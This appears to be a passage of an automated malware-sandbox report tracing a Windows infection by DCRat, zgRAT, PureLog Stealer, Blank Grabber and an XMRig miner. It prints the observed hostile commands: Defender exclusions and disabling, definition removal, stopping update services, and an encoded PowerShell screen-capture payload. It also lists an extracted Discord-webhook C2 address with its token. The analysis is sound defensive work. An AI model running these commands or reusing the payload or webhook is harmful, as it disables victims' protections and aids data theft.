              • cvtres.exe (PID: 1344 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • cmd.exe (PID: 1344 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 8164 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7844 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • Conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6996 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • HpQPPZazcv.exe (PID: 7860 cmdline: C:\Recovery\HpQPPZazcv.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
  • HpQPPZazcv.exe (PID: 7992 cmdline: C:\Recovery\HpQPPZazcv.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
  • cmd.exe (PID: 7948 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 796 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8180 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8048 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7540 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7328 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      C:\Recovery\HpQPPZazcv.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\HpQPPZazcv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Windows Defender\en-US\based.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Windows Defender\en-US\based.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 10 entries
              SourceRuleDescriptionAuthorStrings
              00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Click to see the 11 entries
                        SourceRuleDescriptionAuthorStrings
                        14.3.svchost.exe.4e4e6ea.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          14.3.svchost.exe.4e4e6ea.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            30.0.ChainComServermonitor.exe.4b0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                              30.0.ChainComServermonitor.exe.4b0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                14.3.svchost.exe.564e6ea.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                  Click to see the 5 entries

                                  Operating System Destruction

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7948, ProcessName: cmd.exe

                                  System Summary

                                  barindex
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ProcessId: 7008, TargetFilename: C:\ProgramData\svchost.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 6972, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 6976, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe
                                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ParentProcessId: 7008, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 3808, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe
                                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\svchost.exe, ProcessId: 3808, TargetFilename: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe
                                  Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKA